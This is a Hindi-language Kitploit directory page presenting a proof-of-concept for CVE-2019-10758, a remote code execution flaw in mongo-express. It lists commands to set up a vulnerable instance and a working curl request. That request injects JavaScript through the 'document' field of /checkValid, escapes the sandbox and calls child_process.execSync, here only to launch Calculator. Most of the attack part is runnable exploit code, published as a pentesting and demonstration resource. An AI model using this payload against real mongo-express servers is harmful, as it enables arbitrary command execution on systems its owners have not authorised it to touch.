Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2019-10758 — CVE-2019-10758 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो निर्मित दस्तावेज़ इंजेक्शन के माध्यम से mongo-express में दूरस्थ कोड निष्पादन प्रदर्शित करता है। इसमें curl और स्क्रिप्ट-आधारित पेलोड शामिल हैं। | Kitploit
उपकरण/GitHubGitHub/masahiro331/cve-2019-10758
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंग
GitHubmasahiro331/cve-2019-10758

CVE-2019-10758

CVE-2019-10758 के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, जो निर्मित दस्तावेज़ इंजेक्शन के माध्यम से mongo-express में दूरस्थ कोड निष्पादन प्रदर्शित करता है। इसमें curl और स्क्रिप्ट-आधारित पेलोड शामिल हैं।

रिपॉजिटरी देखें
1112136 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2019-10758 PoC

सेटअप

root@kitploit:~
docker run -p 27017:27017 -d mongo
npm install [email protected] 
cd node_modules/mongo-express/ && node app.js

cURL शोषण

root@kitploit:~
curl 'http://localhost:8081/checkValid' -H 'Authorization: Basic YWRtaW46cGFzcw=='  --data 'document=this.constructor.constructor("return process")().mainModule.require("child_process").execSync("/Applications/Calculator.app/Contents/MacOS/Calculator")'

स्क्रिप्ट शोषण

root@kitploit:~
node main.js
टूल डाउनलोड करें